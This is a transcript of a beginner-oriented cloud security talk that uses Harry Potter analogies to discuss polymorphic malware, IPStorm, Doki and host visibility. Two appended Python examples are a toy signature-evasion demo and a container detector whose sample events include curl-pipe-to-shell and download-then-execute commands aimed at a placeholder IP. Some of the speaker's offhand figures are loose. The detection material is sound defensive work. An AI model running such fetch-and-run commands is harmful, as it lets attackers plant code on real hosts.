
Hey everyone, welcome to A Muggle's Guide to Security in the Cloud. Now, before I get started, I do want to mention that "muggle" is never going to be used as a negative term here, because to me it's interchangeable with "newbie": it just means that you have powers that you've yet to discover. I guess I should go ahead and introduce myself. My name is Ell Marquez, and I am the Security and Linux Advocate at Intezer. Yeah, what does that mean? It means that I get to work with other wizards to, like, dissect spells and figure out how they were put together. But this wasn't always the case. Before this I was a Linux system administrator, and this meant that I was able to learn spells that helped me cast spells around my environment, my customers' environments, and protect them from any attacks that they were gonna face. And then I was able to progress my craft to build the cloud itself, and then I learned how to actually break spells apart and put them into these little, you know, con... hold on, yes, you muggles call them containers. All right, I'm being a dork, and that is what you should 100% expect from this presentation. What you need to know is my name is Ell and I am a wizard, and this talk is gonna be cheesy, and I mean over-the-top cheesy, and you're gonna groan and go like, "Oh my god, I can't believe she just said that," and that is perfect, because when we're virtual you're gonna pay attention to other things. Your kids are gonna walk in. Trust me, I've done recordings where my kids just walk in and start talking to me in the middle of it. It's gonna happen to you: you're gonna hear it from the side and you'll be like, "I'm sorry, what did she say?" and you're gonna tune in and you're gonna remember it. So when somebody asks you a question you'll be like, "Oh, let me tell you what happened," and it's going to be great. With that said, let's get into today's agenda.

Now, today's agenda is really, really simple. You know, we're going to talk about our spell books, and we're going to delve into the terminology in it. I mean, mudbloods and wizards and Death Eaters, oh my! And from there we're going to talk about Hogwarts. I mean, this is the key foundation to our world, right? So we're going to delve into some Polyjuice, and what are you all here for, right? You're here to take Defense Against the Dark Arts. All right, maybe I've carried the analogy too long, because you probably have no clue what we're going to talk about today. So what are we going to talk about today? Terminology. It's at the foundation of any communication that we have in this industry. Then we're going to talk about cyber criminals. Like, I hate to say this, but they're the only reason we have a job. If they didn't exist, what would we be doing? And we're going to have a serious conversation about what it is that we are most afraid of in cyber security, and that's the unknown. Then a key factor that we don't ever talk about in cyber security, and I can tell you I've been in the field for a while and it's not until recently that I've even heard it, and that's the concept of code reuse. Okay, not going to geek out now, I'll wait till I get to that part. And of course we're going to definitely focus on defense. Now check that word out for a minute, and then check it throughout my presentation, a little Easter egg because I'm a dork.

All right, let's kick this off with spells and terminology. Now, if you all would please take out your spell books; this is really where we need to kick off this class. One thing you need to know, though, is terminology in cyber security is this big alphabet game, and you know I don't take myself seriously, have you not, like, figured this out throughout this entire presentation? So I'm gonna say things incorrectly, I might call things incorrectly, I've had a long day, I'm gonna stumble over my words, and if that's what you're focused on, then you're missing the entire purpose of this conversation, because it's going to happen whenever you're working with a team. Like, one of the phrases, and I promise you it's not verbatim because I can't remember, but it was very similar to it, was a senior-level tech trying to impress us, you know, little muggles that were there, and saying, "Our company's EC2 instances have been compromised due to CVE-2009-021, or 0021, go look it up (legitimately, I remember that part), and we can't afford for these attackers to circumvent the certificate chain via DSA and ECDSA keys." Who's impressed by that? You don't impress me by your terminology, you really just kind of make me feel bad for you that you feel you have to speak that way. And you're going to be in that situation. People are going to be able to impress you with the spells that they cast because they're wizards and you'd never be able to understand. You know what? You're a muggle, be proud of it, because you can actually say, "You know what, an attack happened on our Amazon cloud servers and it was successful, so we really should fix our authentication." That's it. You spoke muggle language and you got everything clear and understandable.

All right, I want you to go ahead and pull out your first spell book, right? This is your Standard Book of Spells, Grade... oh man, I forgot completely to actually tell the organizers that you are going to need these spell books, so we're going to have to edit this talk, and we're going to just kind of come back to it. You can attend my, you know, wizard class for cloud security because we'll delve into it, but you'll be fine; I'll give the links to the organizers and you can get them later. All right, the whole concept of this book is all around terminology. I still use it, like I probably used it a few days ago, because sometimes you know a term but it's really hard to, you know, vocalize it, to be able to explain it to others. And maybe one of the reasons that I actually, you know, tell you about this book, maybe a little like Lockhart here, is if you look really closely on the screen you can see that I was involved in the foreword writing of this book, and that's because the authors of this book really believed in the campaign that I've started about "it's okay to be new". Just think of it as "it's okay to be a muggle". The next book is gonna be Dissecting the Hack, and this is what I call the storybook of spells. It's because it's an actual story written about two guys who are out there, you know, like really living the life that we all want to in cyber security, kind of borderlining criminal, but, you know, and they fall into the world of Death Eaters, and as you're going through terminology and as you're reaching spells, you can go to the back and you can get a true explanation of how those spells actually impacted the storyline.

Let's get into why you're actually here in class today, and that's the attack. One key fact in every cyber attack is that there has to be some form of wizard, maybe a very talented muggle who hasn't discovered he's a wizard, that is involved behind it. I don't care what the threat is, I don't care how it's been automated, somebody wrote the code, somebody launched that attack for it to start. In the security industry we really always like to look at these attackers as the Death Eaters, right? It's not just some common wizard, it is somebody who has this scary power to be able to get into our systems and cause this havoc. I mean, this is the face of an attacker, right? Somebody's sitting there with their hoodie up and the Guy Fawkes mask up (wow, I told you I wasn't gonna be able to talk) and they're in this dark room crafting and writing their evil spells, writing their malware to compromise our environment. It's going to be further from the truth. In fact, most of the time our attackers look like this. And, you know, honestly, in the regular world, outside of the wizard world, outside of Harry Potter, there are no true blue... blue bloods, pure-blood wizards. It's all regular humans who have learned a trait, who have spent the time to teach grains of salt how to do so much more (I mean, after all, that's all computers started with), and unfortunately they've decided that they're going to use their powers for malicious acts, you know, such as targeting our system, such as launching their malicious spells, their malicious code. And it's truly important for us not to group all these attackers in the same bucket, because when we do, we really place our companies at the forefront of actually being attacked, because we go into these crazy scenarios of how we're going to be attacked. I mean, it's going to be this advanced APT who's going to be targeting our specific systems, trying to get, you know, through all our walls of defense, and they're going to be targeting this specific database because they're already going to know, and we build these scenarios in our minds. And then some common kid, you know, I don't know, 16, 7-year-old kid, 17-year-old kid, maybe seven, playing around on his dad's computer finds, like, a script that he's like, "Oh, this is really cool, I should try this," does a port scan, you know, on Shodan, finds something, launches it, takes down your entire environment. If this seems like, "Y'all, that would never happen, like you've gone too far in your examples," I'll put a link on it, lo punk.com, you know, Charlotte, or you could just Google it. Like, I'm sorry, I'm getting really excited and nerding out, but I want you to Google "MafiaBoy", aka the boy who took down the internet. That's not an example that I just gave you, that's a true story.

So our attackers have to have something that they're targeting, right? They have to go and actually breach an environment. They have to have a goal, because, hey, I can do all the thinking about doing evil things and writing all the spells; it doesn't accomplish anything until it actually occurs. So this is where we're going to talk about Hogwarts. And when you read the books, if you've watched the movies, you feel like you really understand what that castle is like. I could draw it out for you, I can tell you what paintings were there, I can, you know, create the world for you, because I've read that book 15 times. But if you had, you actually understand that there's no way for all of us to know that; I mean, that's highlighted over and over in the book. That's true with all of our environments. You know, we've got schematics and we've got all this planning and we've got policy books and procedure books, and the truth is that technology is changing so quickly. The cloud has brought the ability for this agility. We have, you know, companies such as Netflix and Capital One spinning up containers every 10 seconds, every... I mean, like, I've seen talks and presentations where they're talking about it happening like every few seconds. Tell me how you're going to see visibility in that. And it's not just containers, it's cloud servers, it's using things like Lambda functions. It's impossible for us to know every single thing that's occurring within our AWS cloud. Now let's add a hybrid cloud: we've got Azure, we've got GKE, we've got Google Cloud for our Kubernetes instances, and we're at a disadvantage. So what we fear the most is the unknown.

I've had conversations with companies and I'm like, "Okay, let's break this down, we're going to go from the bottom up. What are you trying to protect?" "Our environments." That doesn't tell me anything. Like, the analogy that I use, I've used several times, my apologies if you've heard it, is the fact that that's like taking your car in, and, you know, it's making a noise, it's doing whatever, and the mechanic asks, you know, "Hey, what are we working on today?" and you say, "Ah, the car," and walk off. It's possible for him to figure it out, and it's going to take a lot of work. And guess what? While we're trying to figure out what that environment is, while we're trying to figure out where that data is, it's going to shift 15 times. So the number one thing that you need to know is: what are you trying to protect? If it's your data, where is it located? Is it multiple clouds? Is it in a database? Is it, you know... well, that's in the database, sorry, where is that database located? Are there databases out there that actually aren't being reached by anyone, so then they just become a vulnerability, someplace for attackers to be able to target because we don't know where it really lies? My dear muggles, this is where your power is just going to explode, because your high-level wizards, they're like, "Oh, we know everything, we have all these schematics, look, I have this entire wall of boards that I can see all the spells being crafted," where I kind of want to go X-Men here and, so, like, where all the mutants are, but yeah, I'm not gonna, I'm not gonna cross streams because that has bad consequences. We ask why. As muggles we have questions. We say, "Wait, why did that happen? How do I know? How do I handle this ticket?" Like, it is those questions that are really going to help companies be able to develop a new strategy to protecting the cloud. Wizards are still just stuck in their old ways, you know, as like infrastructure on premise. My dear muggles, this is your power, and it is stronger than you will actually ever know.

How do you actually implement, how do you use it? The same way that Harry Potter did. What he needed was visibility, so he was lucky enough to be gifted with a certain map. You know, to me this was a very exciting part of the book, because we finally see, you know, the story, just to me, expand much further than, you know, Harry within himself. We started seeing the interaction between other characters and this storyline that weren't specifically from his point of view. But what happened when he got this map, specifically further in the books, not the original (like, go down, pretend that we're just, like, condensing them all together), is he was able to see a character that wasn't supposed to be there. I mean, he was there, obviously, like the map was saying, but Harry had never seen him, there'd been no one that ever saw him, so what was going on? This is exactly where you need to have your mindset, because there's a muggle... I'm gonna be honest with you, and people say I shouldn't say this because it's condescending or whatever, but look, you're gonna be lost, you're not gonna know what's going on, and that's okay. That's where your questions spur from. But it's very intimidating, because we see an issue, we look at the map, we know it's there, but we don't always understand. Like, that's fundamentally the cloud. You're not alone in that. The cloud is changing. You have three-month release cycles, you have all those deployments that I talked about, AWS has something like 18,000 services available right now, and by the time you watch this video it might have completely changed. You can't be scared of the unknown, because you're going to live in fear your entire career, and I don't mean to, like... my muggles, I don't mean to scare you. I'm going to present a very real picture to you of what you're going to see, but what I want you to know is not being afraid, accepting that that's gonna happen, that's what you need to really level up from going from a muggle to a wizard. And it's going to take some time, and that's okay, because if it's taking time, it means that you're not taking shortcuts, that you're growing with the cloud itself, and that you are willing to take the time to understand. I've said it so many times, but I need you to listen: that is what sets you apart, that is where your power is, and that really became the reason that I decided to write this talk, you know, A Muggle's Guide to Cloud Security, because it's not that difficult to understand when you break it down to the basics, and that's exactly where you are right now.

Okay, enough, you know, building you up, though I think it's important. Let's dig into the next important part, and that's Polyjuice. Now, we all saw Polyjuice as this very comical concept, right? Oh, you know what, there was a little hair from the cat and turned into a, you know, turned into a cat kind of hybrid, you know, funny funny funny. But the fact is that this was the core of the attack that happened, and we don't stop to actually make the connection at how powerful this truly was. It's not just a comical stance. I mean, even when they talk, you know, and they really go into Harry trying to mount his defenses and get information, like, "Hey, look, Harry's dressed in Hermione's clothes, oh ha ha, he has this little tight dress," like it really, I don't... brings down the power of this attack. And that's exactly what we're doing when it comes to cyber security. I mean, let's stop, take a breath, and really analyze this picture, but do so through the eyes of a security-minded muggle. You'll love how I just kind of keep putting you in different places: hey, welcome to the cloud, welcome to security, your job's going to change 15 times and you've got to change your outlook. Okay, so what happened was everybody took some poly... some Polyjuice and they started bringing out the appearance of Harry Potter, but they didn't get the mannerisms, they didn't get the personality. They mutated, in a sense, but they still retained who they were. And yes, they completely tried to match all the mannerisms and their voices, and it was funny, but this is actually a process that is happening with attackers. There's this concept called polymorphic malware, and it's malware that's written in order to continuously change. It goes into a system, it kind of worms its way throughout other systems, you know, pivoting, and as it does, it's constantly changing the code that it is. It changes part of its code, which then bypasses our signature-based detection. It changes the way that it acts, bypassing our anomaly-based detection.

This isn't a new concept. Polymorphic malware has been around longer than I have in this industry, which might not say much, but you get the point. You can talk to any old neckbeard, any longbeard wizard, and they'll be able to tell you a story about polymorphic malware. The scary thing is that it's still occurring today. These types of attacks are occurring every day, and we still don't have the defenses that we need. Stop to think about this: decades of a certain type of attack, and it's still functional today. Where are we with our security posture? This is one of my favorite kind of malware families to speak about. I always feel weird saying that I have favorite malware, because it kind of makes me feel that I'm saying it's okay for attacks to happen. I'm not. But when you're going to be, especially in DFIR, in the research center, you have to enjoy what you're doing, because there's never a true answer. It's always another rabbit hole and another rabbit hole and another piece of malware that's changed. Accept that, own it, love it, and you are going to excel in this industry. But what you're seeing here over on the left side, where it says "family samples", is literally that: different samples, different signatures of malware that we've seen out in the wild. And I'll include a link on my website where you can go through and reanalyze the code and see what else is appearing from there. I mean, look at what you're seeing right here when it comes to the first scene: how many of these strands occurred on the 29th? This is how quickly this malware is actually changing, and you can see as far back as September 25th... September, sorry, 14th, that you're seeing it. Now, one key piece that isn't discussed, that by listening to this talk you're gonna have the heads up on, is that you can't take ancient (I'm gonna go with ancient, but whatever, standardized), you know, antivirus, it worked on our infrastructure, and port it over to the cloud, because historically you can see that it's failing. And how can I make these, you know, big accusations, and how can I say "historically"? It's right here on the screen that you're looking at. Move over to the last column over there that says VirusTotal. This is how many of the engines on VirusTotal (I shouldn't laugh) on VirusTotal actually detected this piece of malware. Okay, so starting from the very, very bottom, we see 47 out of 69 detected. Okay, and the reason the numbers at the end change is because sometimes some engines are available and sometimes they're not; not the point, you can just look at the variables. So okay, you know what, that's getting too close to half, and we did something. The very next string, the very next piece, the variant of that malware, is now getting 21 out of 60. How are we going down in detection from the time that we've first seen it? And, you know what, look right there, like one, two, three, four, up: zero detection. Zero. This is known malware. We know it's happening. We've talked about polymorphic, now we're like, none of this is a secret, none of this should even catch our wizards off guard, but it is. It's right there, I'm not making this up, you can go run the scan yourself. The way that I relate this back to Harry Potter, and maybe you, dear muggles, can actually explain this to our wonderful wizards this way so that
they'll understand, is when we're looking at our professor of the Dark Arts. He fooled everyone, almost, but follow me along, our analogies aren't perfect, and two, he was just the sad little pathetic man who we should probably feel bad for because he can't even really speak, but secretly he had powers within him that, yo, I was surprised when it happened, I don't know about you, but it really caught me off guard in that part of the movie. And that sample that I just showed you, and go back to the screen here, of IPStorm has an interesting background to it. You see, IPStorm is actually malware that was written for Windows. How many of you would be sitting here going, "Hmm, I should probably look for that Windows malware on my Linux box"? I promise you, now hopefully people are thinking that, but about this time they weren't. However, everything is constantly changing, and we've seen the release of a whole new spell language, if you want to see it: we've seen Golang really start to prosper in the cloud environment. It is the language that all your cloud-native stuff (ooh, fancy word, right? let's get our spellbook out; all it means is applications and things that were written specifically to work well in the cloud, like Kubernetes) like... you can, I'll add links, but they're not even there, I'll go add them, because it is a very important term that you need to understand so you can impress those wizards out there. IPStorm was actually dubbed from the InterPlanetary Storm, and it used peer-to-peer, P2P, networking, that's what it's called, impressive, right? Well, it didn't matter. Like, that was a Windows-based system, and attackers went, "Okay, we have something that's working, it's continuously working, why are we going to reinvent the wheel? Let's just take that code, change it up a little bit, and target Linux systems." When Intezer researchers found it, it actually had zero-based detection within it, and it was running on Linux and macOS. There is a whole new field that we need to be aware of, a whole new crop of wizards, evil wizards, Death Eaters, but they're wizards, and they are completely owning this field because they're thinking in ways that our wizards right now are not. So let that be another lesson to you: you need to be more like the Death Eaters. Maybe that's not the right way to say this lesson, but you need to have creativity. You don't need to reinvent the wheel, you just need to think outside the box, because the power that all of these attackers have is the power to fool us in who they are. They don't look as threatening. We're looking for Death Eaters, but they're just this underground group that we really don't know about that much, and we really haven't placed that much priority on catching them.

I had a very, look, what was a scary situation occur the other day, and I was talking to a company, and I'd kind of seen hints of this before, but this was the first time that somebody just came out and told me this. They said, "You know what, when we have releases in the cloud, it needs to happen quickly, it needs to be out there as soon as possible, because we've made promises to our customers that this function is going to come out." Understandable, right? That's what a company does. And they're talking about how their deployment cycle comes, and they said, "Eventually we know that there are vulnerabilities in the cloud, we know that people know about these vulnerabilities, but we have to get that function, that part of the product, out. So we sit down and we look at it: what are the benefits that we're gonna have getting this out? Like, you know, our customers are gonna be excited, we're the first to market, we're going to gain money, people are going to come. And what's the likelihood that we are going to be attacked? What's the likelihood that that vulnerability can't be fixed in time, fix it in production before we're attacked, the capability that attackers aren't even gonna know it's there? So how much money do we stand to make versus all of that, and how much money do we stand to lose?" How scary is that? That's your data, that's your money, and this is the way that they're playing. They're choosing not to see that side of the face, they're choosing only to focus on that innocent Quirrell (can't even talk right), professor of the Dark Arts.

Now, talking about professors of the Dark Arts, have you ever stopped to think about how many of them really weren't what they thought they were? Like, shouldn't Hogwarts have maybe had some kind of vetting or something after the first one got through? Shouldn't we have some kind of vetting or monitoring after the first time the malware got through? This is probably one of the analogies that isn't even a stretch. Done a lot of talking. This is interesting, and one thing I should have mentioned, I'm completely gone, is that the Dark Arts teachers that we suspected the most to be the evil ones, to be the ones that were crafting bad, or crafting malicious spells, are the ones that were actually trying to help. Like, oh, that was very comical to me, great writing. But we can't take things at face value when it comes to our environments, when it comes to the code that we're running, because something might look like, "I really need to dig into this," and then we spend hours upon hours (and I can tell you, we really do) delving into this rabbit hole because, you know, it's something, only to find out that it was just a blip in the code: the dev ran something and forgot to tell us, they updated their code, and oh yeah, it used up more CPU. And what happened during that time? A crafty attacker who, you know, seemed very innocent was able to launch code in our boxes that acted the way that we expected it to, and now our data's for sale to the highest bidder.

Simple explanation: you know, I've gone very high, I've gone very low, and if you are a muggle who just has a day or two even learning about the world of the wizards, it might be a little complicated. That's okay, you'll get up to us and you'll be a wizard probably long before I am. Here's our simplified explanation. Hogwarts (and y'all are probably gonna be laughing if I'm not saying that correctly; after this whole day you say it differently, but you get the point anyways), think of that as our host machine. That's our cloud server, and that's really where everything happens. And one of the clear things that we need to see, how I talked about visibility, is we don't know everything that's there. It's important that we use tooling that helps us really look into this. Now, this tooling can be completely different for each company. I'm not telling you what specifically to use, but I'm lazy and I know the tools that I use are simple, so that's what I'm going to be showing you, so take that and do whatever it is that you want to. But by actually being able to see not only what hosts we have but what's running on them, like which one of these are my Kubernetes instances, what nodes work with them, you know, what images are running on them, you can get visibility to actually be able to monitor if the attacker is in your system. This is key. I don't remember if I said this in this talk before, because I say it so many times, but behind every attack there has to be malicious code run. You can have all of the back doors available to your castle that you want to, and unless somebody walks through them and does something, it's not that big of a deal, right? Somebody walks into the wall, or sends the walls into the doors, and just kind of stands there; I mean, it sucks that they're there, but they're not really doing anything. It's when they start monitoring, when they start launching and looking into your environments and trying to do things, when that spell is cast, that you really can monitor them and that there's actually an issue. Because it goes back into, you know, we have the Great Hall and we have hundreds, if not thousands, of students, and they're all supposed to be there, but could you go down that list and name each one of them to me and tell me what they were doing and, you know, what house they were a part of? Like, I know, like, three of these characters; all of them were other extras that weren't even given speaking lines. But at the same time, how many evil wizards, how many Defense Against the Dark Arts people were allowed to be there? I mean, to a certain degree, when did Malfoy become evil? We see it happen, we know it's happened, but do you know the exact moment that it occurred? That's what you need visibility to. Good code could be turned into malicious.

I didn't put it in the slide, but, hey, I just go off the cuff. There is a piece of malware that was found called Doki. Doki is probably my second favorite example to use, so if you hear a bunch of my talks you're going to hear it, but it's fascinating to me, because Doki isn't malicious. There's absolutely no malicious code to it. It's Malfoy's, you know what, he's probably rude, you know, some of our images, like, don't work well on containers, and we hate it as security folks because it brings up alerts, but nothing was ever happening. So Doki is just a piece of code run up as an image, but within seconds it turned malicious, because it was able to use the curl command (and as a former sysadmin I can tell you we use that a lot; it is a great troubleshooting tool), it pulled down malicious code, it ran it, and like that it was gone. Now our host has been compromised. There's perhaps, you know, the one that we discovered, once again zero-based detection, was running a crypto miner. Like, all of this without really anything alerting you to what occurred. It's, like I said before, shouldn't there have been some, like, vetting process on who was going to take that position if it kept being taken by people who are trying to kill Harry? Just saying. Which brings me to
Mad-Eye Moody. Like, am I the only person that is, I'm reading it going, "There's something not right with this guy"? But he's trusted, he's written all these books, people can verify who he is, like, "We back this teacher, he's going to be great and you're going to learn a lot about it." That's what you're seeing in polymorphic malware. Like, this is one of the examples that I like to use, because this goes completely to Polyjuice. You have code which part of it looks like it's trusted, right? I mean, we've got normal libraries that we'd expect to see on our system, but all of a sudden we start seeing pieces of code that really should kind of go like, "Hey, I've got something on my system and it's running, like, malicious libraries, like, why didn't that trigger us into investigating it? Hey, this shares a lot of code with known malware called XMRig miner, why didn't that trigger us to investigate it?" I can go all the way up. This goes back into the fact that our traditional defenses, that which our wizards are used to using, aren't enough, and this is where you're going to shine. You're going to bring in new ideas, new ways of making new questions to ask, and that's what's going to help all of our defenses get stronger, because you're going to be able to say, "You know what, we need to know what's running in our boxes." And I'm going to, like, tell you, people are going to look at you like, "You know what, like, it's not a conversation that we have anymore, because after all, we have cloud security products, you know, we have dementors flying around the castle helping protect because we know an attack is coming." Like, at some point you have to own your own defenses and know what's going on, and that's where our security team comes in. We're trying our hardest, and you keep hearing all these statistics about how, you know, we don't have enough people in cyber security, and others have said it, but really my belief is that we don't have enough people with the curiosity to really kind of stand up to the wizards, to be in that interview and just own how sometimes your lack of knowledge is the best thing that's going to bring you your strengths. Okay, that's a whole nother talk, so I'm just completely gonna stop here and say that your assets and your most valuable possession as part of the security team is going to be having visibility into everything. If you're the guy that can go in, or girl, my bad, go in and look and say, "You know what, here are our hosts, we've got clean code, we're good, we can focus on the network," awesome. If there is an attack happening and people are delving into the network and they're digging through what firewalls, and you can pull up your tool and be like, "That's great, guess what, they're already in the host, they're running commands, our data is gone." Wow. Like, I'm, okay, I'm geeking out now, like, you don't understand how different that is from the current status quo.

Okay, here I am, last one, I swear, is that a lot of times in the security industry we believe that because we get code, because we get applications from a trusted source, that we're fine. You pulled up your image from, you know, AWS, you're running Ubuntu directly, you went to the site and you launched it, you're running your Node.js application specifically from the repository.
Go Google "Node.js compromise", that's it, just go Google it, I will let you make that discovery completely on your own. Did you know that the Linux kernel was compromised? Attackers got into it, and to this day they can't tell you how long it happened or what it was there; estimates are about six months, but they're not sure. There have been so many repositories now (I'll post links just to make sure I get these right), but I believe it's the Apache repository that's been owned three times. They know what happened, they have an estimate of what occurred, but you're following that trusted source and running the code on your system, and sometimes even as you're running the code, new CVEs are found. What was it, 18,300-and-something CVEs were released last year, and, like, 4,000 of them were labeled as critical. I can't tell you what CVEs came out this month, I can't even tell you if they've been patched, but if you know, and you have whatever tool it is that you choose to know, and you can have these conversations with your devs, then you are worth your weight in gold when it comes to this industry.

Okay, I've said a lot, and I'm happy to answer questions, because I know I just did, like, this verbal dump on you, and hopefully you saw a lot of it is encouraging. Hopefully you've been taking notes and, you know, things that you want to, you know, go out and Google, but there's no better way to learn than to ask questions, and that's why I'm here. So, you know, jump on the Discord, ask, I promise you I will do my best to answer it, and if I don't know, do you remember the very beginning that I said I work directly with researchers? I will find you the answer that you need, because the wizarding world is open to everyone, including you muggles. So with that, let's jump into questions. That's it.
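The polymorphic-malware passage (the VirusTotal column dropping from 47/69 to zero across variants) and the later Mad-Eye point about code sharing libraries with a known miner such as XMRig, as an added Python example that is not part of the talk or of any Intezer tool: a constructed family whose builds differ only in a throwaway XOR "skin", so a file-hash signature learned from the first build misses every rebuild, while matching on the unpacked code (its hash, or a string the family shares) still catches them. The stub format, payload strings, pool host and keys are all made up for the example.

```python
"""Why a hash signature that caught yesterday's sample misses today's rebuild.

Constructed model of a polymorphic family: the same miner payload is re-wrapped with a
fresh one-byte XOR key and a junk prefix each time it is rebuilt, so every build has a
different file hash while the code that actually runs never changes. All samples here
are made up; the "payload" is a few identifier strings, not executable code.
"""
import hashlib

STUB_MAGIC = b"POLYSTUB"  # constructed marker for the toy decryptor stub

# Constructed payload standing in for the miner logic every build shares. A stratum pool
# URL is the kind of string XMRig-derived miners carry; the host and wallet are placeholders.
MINER_PAYLOAD = (
    b"stratum+tcp://pool.example.invalid:3333 "
    b"--donate-level=0 --user=WALLET_PLACEHOLDER hash_loop submit_share"
)
BENIGN_PAYLOAD = b"read_config open_log rotate_files write_report"


def make_variant(payload: bytes, key: int, junk_len: int) -> bytes:
    """Re-skin a payload: new XOR key and junk prefix, identical code underneath."""
    junk = bytes((key * 7 + i) % 256 for i in range(junk_len))  # deterministic filler
    body = bytes(b ^ key for b in payload)
    return STUB_MAGIC + bytes([key, junk_len]) + junk + body


def file_hash(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def static_signature_match(blob: bytes, known_hashes: set) -> bool:
    """What a hash-based engine does: exact match on the file as it sits on disk."""
    return file_hash(blob) in known_hashes


def unpack(blob: bytes) -> bytes:
    """Recover what would actually execute (what a sandbox or memory scan sees)."""
    if not blob.startswith(STUB_MAGIC):
        return blob  # not wrapped; inspect as-is
    key, junk_len = blob[len(STUB_MAGIC)], blob[len(STUB_MAGIC) + 1]
    body = blob[len(STUB_MAGIC) + 2 + junk_len:]
    return bytes(b ^ key for b in body)


def code_reuse_match(blob: bytes, known_code_hashes: set, indicators: tuple) -> bool:
    """Match on the unpacked code: its hash, or a string shared with a known family."""
    code = unpack(blob)
    if hashlib.sha256(code).hexdigest() in known_code_hashes:
        return True
    return any(ind in code for ind in indicators)


def detection_report(samples, known_hashes, known_code_hashes, indicators):
    """Count how many samples each approach flags; mirrors the shrinking VT column."""
    static_hits = sum(static_signature_match(s, known_hashes) for s in samples)
    reuse_hits = sum(code_reuse_match(s, known_code_hashes, indicators) for s in samples)
    return static_hits, reuse_hits


# Constructed sample set: the first build was submitted and its hash learned; the family
# then rebuilt twice, and one unrelated benign tool is mixed in.
FIRST_SEEN = make_variant(MINER_PAYLOAD, key=0x5A, junk_len=4)
REBUILD_1 = make_variant(MINER_PAYLOAD, key=0x3C, junk_len=9)
REBUILD_2 = make_variant(MINER_PAYLOAD, key=0xE7, junk_len=16)
BENIGN_TOOL = make_variant(BENIGN_PAYLOAD, key=0x11, junk_len=2)
SAMPLES = [FIRST_SEEN, REBUILD_1, REBUILD_2, BENIGN_TOOL]

KNOWN_FILE_HASHES = {file_hash(FIRST_SEEN)}                      # what the signature DB learned
KNOWN_CODE_HASHES = {hashlib.sha256(MINER_PAYLOAD).hexdigest()}  # what code analysis learned
STRATUM_INDICATORS = (b"stratum+tcp://",)                        # string shared by the family

if __name__ == "__main__":
    static, reuse = detection_report(SAMPLES, KNOWN_FILE_HASHES, KNOWN_CODE_HASHES, STRATUM_INDICATORS)
    print(f"malicious samples: 3, hash signature flags {static}, code-reuse analysis flags {reuse}")
```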
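The Doki story from the talk (a harmless image that uses curl to pull down code and run it within seconds) turned into detection logic, as an added Python example that is not from the talk or from any product: it walks constructed container process-exec events and flags a container that executes a file it just downloaded, or pipes curl straight into a shell, while staying quiet on a troubleshooting download that is only parsed. The event field names, image names and hosts are assumptions made for the example.

```python
"""Flag a container whose image "turns malicious within seconds": a process inside it
downloads a file with curl/wget and the same container then executes that file.

Input is a stream of process-exec events like a container runtime sensor would emit. The
field names (ts, container, image, exe, args) are assumptions, not any product's schema,
and every event below is constructed for the example.
"""
import json
import posixpath
import re
from collections import defaultdict

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash", "ash", "python", "python3", "perl"}
# "curl ... | sh" inside one shell command: download and execution in a single exec event
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|a)?sh\b")
WINDOW_SECONDS = 300.0  # how long after a download an execution still counts as linked


def download_target(args):
    """Return the local path a curl/wget command line writes to, or None if not a download."""
    tool = posixpath.basename(args[0]) if args else ""
    if tool not in DOWNLOADERS:
        return None
    url = next((a for a in args[1:] if "://" in a), None)
    for i, a in enumerate(args):
        if tool == "curl" and a in ("-o", "--output") and i + 1 < len(args):
            return args[i + 1]
        if tool == "wget" and a in ("-O", "--output-document") and i + 1 < len(args):
            return args[i + 1]
    if url and (tool == "wget" or "-O" in args):
        # written to the current directory under the URL's basename; cwd is unknown here
        return posixpath.basename(url.split("?", 1)[0]) or None
    return None


def executed_paths(exe, args):
    """Paths an exec event runs: the binary itself, plus the script handed to an interpreter.
    Only the first non-flag argument counts as the script, so a data file passed to a
    program is not mistaken for executed code."""
    paths = {exe}
    if posixpath.basename(exe) in INTERPRETERS:
        script = next((a for a in args[1:] if not a.startswith("-")), None)
        if script:
            paths.add(script)
    return paths


def detect_download_and_execute(events):
    """Return alerts for download-then-execute chains and pipe-to-shell one-liners."""
    alerts = []
    downloads = defaultdict(dict)  # container id -> {written path: download event}
    for ev in sorted(events, key=lambda e: e["ts"]):
        args = ev.get("args", [])
        cid, exe = ev["container"], ev["exe"]
        if posixpath.basename(exe) in INTERPRETERS and "-c" in args:
            idx = args.index("-c") + 1
            if idx < len(args) and PIPE_TO_SHELL.search(args[idx]):
                alerts.append({"container": cid, "image": ev["image"],
                               "reason": "pipe-to-shell", "path": None, "seconds": 0.0})
                continue
        target = download_target(args)
        if target:
            downloads[cid][target] = ev
            continue
        for path in executed_paths(exe, args):
            hit = downloads[cid].get(path) or downloads[cid].get(posixpath.basename(path))
            if hit and ev["ts"] - hit["ts"] <= WINDOW_SECONDS:
                alerts.append({"container": cid, "image": ev["image"],
                               "reason": "download-then-execute", "path": path,
                               "seconds": round(ev["ts"] - hit["ts"], 1)})
                break
    return alerts


def load_events(jsonl):
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


# Constructed events. c1: a web server doing its job. c2: a plain base image fetches a file
# and runs it 0.7 s later (the Doki pattern). c3: a troubleshooting curl whose output is only
# parsed, never executed. c4: the one-liner variant. Hosts are documentation addresses.
SAMPLE_EVENTS = """
{"ts": 100.0, "container": "c1", "image": "nginx:1.19", "exe": "/usr/sbin/nginx", "args": ["nginx", "-g", "daemon off;"]}
{"ts": 101.2, "container": "c2", "image": "alpine:3.12", "exe": "/bin/sh", "args": ["sh"]}
{"ts": 101.3, "container": "c2", "image": "alpine:3.12", "exe": "/usr/bin/curl", "args": ["curl", "-s", "-o", "/tmp/.x", "http://198.51.100.7/x"]}
{"ts": 101.9, "container": "c2", "image": "alpine:3.12", "exe": "/bin/chmod", "args": ["chmod", "+x", "/tmp/.x"]}
{"ts": 102.0, "container": "c2", "image": "alpine:3.12", "exe": "/tmp/.x", "args": ["/tmp/.x"]}
{"ts": 150.0, "container": "c3", "image": "python:3.9", "exe": "/usr/bin/curl", "args": ["curl", "-s", "-o", "/tmp/status.json", "https://api.example.invalid/status"]}
{"ts": 151.0, "container": "c3", "image": "python:3.9", "exe": "/usr/bin/python3", "args": ["python3", "/app/parse.py", "/tmp/status.json"]}
{"ts": 200.0, "container": "c4", "image": "ubuntu:20.04", "exe": "/bin/bash", "args": ["bash", "-c", "curl -fsSL http://198.51.100.7/setup.sh | sh"]}
"""

if __name__ == "__main__":
    for alert in detect_download_and_execute(load_events(SAMPLE_EVENTS)):
        print(alert)
```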